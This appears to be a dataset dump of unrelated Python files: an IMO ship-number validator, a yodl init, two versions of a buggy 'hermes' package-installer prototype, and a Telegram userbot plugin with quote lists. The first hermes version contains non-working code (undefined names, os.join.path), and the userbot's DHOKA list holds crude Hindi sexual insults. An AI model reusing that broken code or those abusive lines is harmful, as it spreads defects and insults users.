# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IMO number (International Maritime Organization number).
A number used to uniquely identify ships (the hull) for purposes of
registering owners and management companies. The ship identification number
consists of a six-digit sequentially assigned number and a check digit. The
number is usually prefixed with "IMO".
Note that there seem to be a large number of ships with an IMO that does not
have a valid check digit or even have a different length.
>>> validate('IMO 9319466')
'9319466'
>>> validate('IMO 8814275')
'8814275'
>>> validate('8814274')
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('8814275')
'IMO 8814275'
"""
from stdnum.exceptions import *
from stdnum.util import clean, isdigits
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
number = clean(number, ' ').upper().strip()
if number.startswith('IMO'):
number = number[3:]
return number
def calc_check_digit(number):
"""Calculate the check digits for the number."""
return str(sum(int(n) * (7 - i) for i, n in enumerate(number[:6])) % 10)
def validate(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
number = compact(number)
if not isdigits(number):
raise InvalidFormat()
if len(number) != 7:
raise InvalidLength()
if calc_check_digit(number[:-1]) != number[-1]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the number to the standard presentation format."""
return 'IMO ' + compact(number) | pt | 0.161467 | 3.557302 | 4 |
yodl/__init__.py | brunolange/yodl | 0 | 13528 | """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
| """yodl!
yodl provides a class decorator to build django models
from YAML configuration files
"""
from .decorators import yodl
from .io import yodlify
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
__all__ = ["yodl", "yodlify"]
| pt | 0.179741 | 1.891091 | 2 |
main.py | g-w1/hermes | 0 | 13529 | """
Usage: hermes install [-dsvV] <pkg>...
hermes -h | --help
hermes --version
Options:
-d, --depends Require dependency installation
-h, --help Display usage and options
-s, --check-sigs Verify package GPG signatures
-v, --verify Verify package checksums
-V, --verbose Display debugging messages
--version Display version
"""
from configure import valid_hermes_config
from configure import valid_pkg_config
from docopt import docopt # MIT License
import os # Standard Library
import requests # Apache License v2.0
import sh # MIT License
import tarfile # Standard Library
def dl_url(url):
dl = requests.get(source_url)
if not dl.status == 200: # is this actually a meaningful test?
return False
with open(pkg_id, 'wb') as archive: # pkg_id deoesn't include extension(s)
for chunk in dl.iter_content(1024):
archive.write(chunk)
# where does it write it? how does it know?
# what about errors?
return True
def get_pkg(pkg_id):
source_url = pkg_configs[pkg_id][source_url]
if not dl_pkg(source_url):
return False
if not os.path.isfile(os.path.join(hermes_dir, 'archives', pkg_id)):
return False
if not valid_archive(pkg_id):
return False
# if runtime_config[verify_pkg]:
# if not verified:
# return False
# if runtime_config[check_sigs]:
# if not verified:
# return False
return True
def get_pkg_config(pkg_id):
# This is a placeholder for repository-enabled functionality
return True
def install_pkg(pkg_id):
if runtime_config['install_dependencies']:
for dependency in pkg_configs[pkg_id]['dependencies']:
if not pkg_installed(dependency):
install_pkg(dependency)
# actual install code here
def main_installer(pkg_list):
for pkg_id in pkg_list:
if pkg_installed(pkg_id):
print pkg_id, 'is already installed.'
elif pkg_prepared(pkg_id):
install_pkg(pkg_id)
else:
# Error message
return False
def pkg_avail(pkg_id):
if True: # if archive is in hermes/archives and valid_archive(pkg_id)
return True
if get_pkg(pkg_id):
return True
# Error message
return False
def pkg_config_avail(pkg_id):
pkg_config_path = os.path.join(hermes_dir, 'configs', (pkg_id + '.hermes'))
if pkg_id in pkg_configs:
return True
elif os.path.isfile(pkg_config_path):
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
elif get_pkg_config(pkg_id):
return False # temporary short-circuit (get_pkg_config() is a dummy)
pkg_config = valid_pkg_config(pkg_config_path)
if pkg_config:
# populate pkg_configs[pkg_id] with contents of pkg_config
return True
else:
# Error message
return False
def pkg_installed(pkg_id):
# if symlink in target_dir points at package in hermes/pkg
# return True
# if symlink in target_dir points elsewhere
# deal with conflict
# if binary already exists in target_dir
# deal with conflict
# Error message
return False
def pkg_prepared(pkg_id):
if pkg_installed(pkg_id):
return True
if not pkg_config_avail(pkg_id):
# Error message
return False
if not pkg_avail(pkg_id):
# Error message
return False
if runtime_config[install_dependencies]:
for dependency in pkg_configs[pkg_id][dependencies]:
if not pkg_prepared(dependency):
# Error message
return False
return True
def populate_runtime_config():
hermes_config = dict()
system_config_path = os.path.join(hermes_dir, '.hermes.conf')
user_config_path = os.path.expanduser(os.path.join('~', '.hermes.conf'))
if os.path.isfile(user_config_path):
hermes_config = valid_hermes_config(user_config_path)
if not hermes_config and os.path.isfile(system_config_path):
hermes_config = valid_hermes_config(system_config_path)
if not hermes_config:
hermes_config['check_sigs'] = True
hermes_config['install_dependencies'] = False
hermes_config['target_dir'] = '/usr/local'
hermes_config['verify_pkgs'] = True
if cli_args['--depends']:
runtime_config['install_dependencies'] = True
if cli_args['--check-sigs']:
runtime_config['check_sigs'] = True
if cli_args['--verify']:
runtime_config['verify_pkgs'] = True
return hermes_config
def valid_archive(pkg_id):
tarball_name = pkg_id + pkg_configs[pkg_id]['tarball_ext']
tarball_path = os.join.path(hermes_dir, 'archives', tarball_name)
if not os.path.isfile(tarball_path):
return False
if not tarfile.is_tarfile(tarball_path):
return False
return True
def valid_pkg(pkg_id):
# if not valid_archive(pkg_id):
# Error message
# return False
# if cli_args[--verify'] and checksum is bad:
# Error message
# return False
# if cli_args['--check-sigs'] and sig is bad:
# Error message
# return False
return True
if __name__ == '__main__':
cli_args = docopt(__doc__, version='hermes v0.0.1')
print cli_args
# hermes_dir = os.path.dirname(sh.which('hermes'))
hermes_dir = 'hermes'
runtime_config = populate_runtime_config()
print runtime_config
pkg_configs = dict()
if cli_args['install']:
print 'Installing ', str(cli_args['<pkg>'])
main_installer(cli_args['<pkg>'])
| """
Usage: hermes install [-dsvV] <pkg>...
hermes -h | --help
hermes --version
Options:
-d, --depends Require dependency installation
-h, --help Display usage and options
-s, --check-sigs Verify package GPG signatures
-v, --verify Verify package checksums
-V, --verbose Display debugging messages
--version Display version
"""
from configure import valid_hermes_config
from configure import valid_pkg_config
from docopt import docopt # MIT License
import os # Standard Library
import requests # Apache License v2.0
import sh # MIT License
import tarfile # Standard Library
def dl_url(url):
dl = requests.get(source_url)
if not dl.status == 200: # is this actually a meaningful test?
return False
with open(pkg_id, 'wb') as archive: # pkg_id deoesn't include extension(s)
for chunk in dl.iter_content(1024):
archive.write(chunk)
# where does it write it? how does it know?
# what about errors?
return True
def get_pkg(pkg_id):
source_url = pkg_configs[pkg_id][source_url]
if not dl_pkg(source_url):
return False
if not os.path.isfile(os.path.join(hermes_dir, 'archives', pkg_id)):
return False
if not valid_archive(pkg_id):
return False
# if runtime_config[verify_pkg]:
# if not verified:
# return False
# if runtime_config[check_sigs]:
# if not verified:
# return False
return True
def get_pkg_config(pkg_id):
    """Fetch a package config from a remote repository (future feature).

    Repository support is not implemented yet, so this always reports success.
    """
    return True
def install_pkg(pkg_id):
    """Install *pkg_id*, recursing into its dependencies first when enabled.

    NOTE(review): the actual unpack/symlink step is still a placeholder.
    """
    if runtime_config['install_dependencies']:
        for dependency in pkg_configs[pkg_id]['dependencies']:
            # Only recurse into dependencies that are not installed yet.
            if not pkg_installed(dependency):
                install_pkg(dependency)
    # actual install code here
def main_installer(pkg_list):
for pkg_id in pkg_list:
if pkg_installed(pkg_id):
print pkg_id, 'is already installed.'
elif pkg_prepared(pkg_id):
install_pkg(pkg_id)
else:
# Error message
return False
def pkg_avail(pkg_id):
    """Return True when the package archive is (or can be made) available."""
    # NOTE(review): the local-cache check is stubbed out -- `if True` means
    # the first branch is always taken and get_pkg() is never reached.
    if True:  # if archive is in hermes/archives and valid_archive(pkg_id)
        return True
    if get_pkg(pkg_id):
        return True
    # Error message
    return False
def pkg_config_avail(pkg_id):
    """Return True when a usable config for *pkg_id* is (or becomes) cached.

    Checks, in order: the in-memory pkg_configs cache, a config file on
    disk under hermes_dir/configs, and finally a (stubbed) repository
    download via get_pkg_config().
    """
    pkg_config_path = os.path.join(hermes_dir, 'configs', (pkg_id + '.hermes'))
    if pkg_id in pkg_configs:
        # Already parsed and cached earlier in this run.
        return True
    elif os.path.isfile(pkg_config_path):
        pkg_config = valid_pkg_config(pkg_config_path)
        if pkg_config:
            # populate pkg_configs[pkg_id] with contents of pkg_config
            return True
        else:
            # Error message
            return False
    elif get_pkg_config(pkg_id):
        # NOTE(review): everything after the next line is dead code until
        # repository downloads are actually implemented.
        return False  # temporary short-circuit (get_pkg_config() is a dummy)
        pkg_config = valid_pkg_config(pkg_config_path)
        if pkg_config:
            # populate pkg_configs[pkg_id] with contents of pkg_config
            return True
        else:
            # Error message
            return False
def pkg_installed(pkg_id):
    """Report whether *pkg_id* is already linked into the target directory.

    Symlink and conflict detection are not implemented yet, so every
    package is treated as not installed.
    """
    # Planned: answer True when target_dir's symlink points at hermes/pkg;
    # a symlink pointing elsewhere, or a pre-existing binary, is a conflict
    # that must be resolved before answering.
    return False
def pkg_prepared(pkg_id):
    """Return True when *pkg_id* (and optionally its dependencies) is ready to install.

    Fixes: the original indexed runtime_config and the package config with
    the bare names ``install_dependencies`` / ``dependencies`` instead of
    string keys, raising NameError as soon as that branch executed.
    """
    if pkg_installed(pkg_id):
        return True
    if not pkg_config_avail(pkg_id):
        # Error message
        return False
    if not pkg_avail(pkg_id):
        # Error message
        return False
    if runtime_config['install_dependencies']:
        for dependency in pkg_configs[pkg_id]['dependencies']:
            if not pkg_prepared(dependency):
                # Error message
                return False
    return True
def populate_runtime_config():
    """Build the effective configuration dict for this run.

    Precedence: user ~/.hermes.conf, then the system config under
    hermes_dir, then built-in defaults; command-line flags override last.
    Fixes: the original applied the CLI overrides to the undefined global
    ``runtime_config`` (NameError) instead of the dict it was building,
    and could assign keys into a non-dict value returned by
    valid_hermes_config.
    """
    hermes_config = dict()
    system_config_path = os.path.join(hermes_dir, '.hermes.conf')
    user_config_path = os.path.expanduser(os.path.join('~', '.hermes.conf'))
    if os.path.isfile(user_config_path):
        hermes_config = valid_hermes_config(user_config_path)
    if not hermes_config and os.path.isfile(system_config_path):
        hermes_config = valid_hermes_config(system_config_path)
    if not hermes_config:
        # No readable config anywhere: fall back to safe defaults.
        hermes_config = {
            'check_sigs': True,
            'install_dependencies': False,
            'target_dir': '/usr/local',
            'verify_pkgs': True,
        }
    if cli_args['--depends']:
        hermes_config['install_dependencies'] = True
    if cli_args['--check-sigs']:
        hermes_config['check_sigs'] = True
    if cli_args['--verify']:
        hermes_config['verify_pkgs'] = True
    return hermes_config
def valid_archive(pkg_id):
    """Check that the downloaded archive exists and is a readable tarball."""
    tarball_name = pkg_id + pkg_configs[pkg_id]['tarball_ext']
    # Fix: the original called os.join.path, which raises AttributeError;
    # the function is os.path.join.
    tarball_path = os.path.join(hermes_dir, 'archives', tarball_name)
    if not os.path.isfile(tarball_path):
        return False
    if not tarfile.is_tarfile(tarball_path):
        return False
    return True
def valid_pkg(pkg_id):
    """Stub package validator: accepts every package for now.

    Intended future behaviour (all still commented out):
      * reject when valid_archive(pkg_id) fails,
      * reject on checksum mismatch under --verify,
      * reject on bad signature under --check-sigs.
    """
    return True
if __name__ == '__main__':
    # Parse the command line against the usage docstring at the top of the module.
    cli_args = docopt(__doc__, version='hermes v0.0.1')
    print cli_args  # debug: show the parsed arguments
    # hermes_dir = os.path.dirname(sh.which('hermes'))
    hermes_dir = 'hermes'  # working directory that holds archives/ and configs/
    runtime_config = populate_runtime_config()
    print runtime_config  # debug: show the effective configuration
    # Per-package configs, filled lazily by pkg_config_avail().
    pkg_configs = dict()
    if cli_args['install']:
        print 'Installing ', str(cli_args['<pkg>'])
        main_installer(cli_args['<pkg>'])
| pt | 0.133275 | 2.447526 | 2 |
userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | 0 | 13530 | import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
"`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon`”",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"eviral has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"eviral has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
CONGRATULATION = [
"`Congratulations and BRAVO!`",
"`You did it! So proud of you!`",
"`This calls for celebrating! Congratulations!`",
"`I knew it was only a matter of time. Well done!`",
"`Congratulations on your well-deserved success.`",
"`Heartfelt congratulations to you.`",
"`Warmest congratulations on your achievement.`",
"`Congratulations and best wishes for your next adventure!”`",
"`So pleased to see you accomplishing great things.`",
"`Feeling so much joy for you today. What an impressive achievement!`",
]
BYESTR = [
"`Nice talking with you`",
"`I've gotta go!`",
"`I've gotta run!`",
"`I've gotta split`",
"`I'm off!`",
"`Great to see you,bye`",
"`See you soon`",
"`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad was your yesterday. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guaranty for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spread light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`If you want to gain health and beauty, you should wake up early. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern="love$", outgoing=True))
@bot.on(sudo_cmd(pattern="love$", allow_sudo=True))
async def love(e):
    """.love -- edit/reply with a random quote from LOVESTR.

    Fix: dropped the pointless f-string prefix on the pattern (no
    placeholders, flake8 F541).
    """
    await edit_or_reply(e, random.choice(LOVESTR))
@bot.on(admin_cmd(pattern="dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern="dhoka$", allow_sudo=True))
async def katgya(e):
    """.dhoka -- edit/reply with a random quote from DHOKA.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(DHOKA))
@bot.on(admin_cmd(pattern="metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern="metoo$", allow_sudo=True))
async def metoo(e):
    """.metoo -- edit/reply with a random quote from METOOSTR.

    Fix: dropped the pointless f-string prefix on the pattern (F541).
    """
    await edit_or_reply(e, random.choice(METOOSTR))
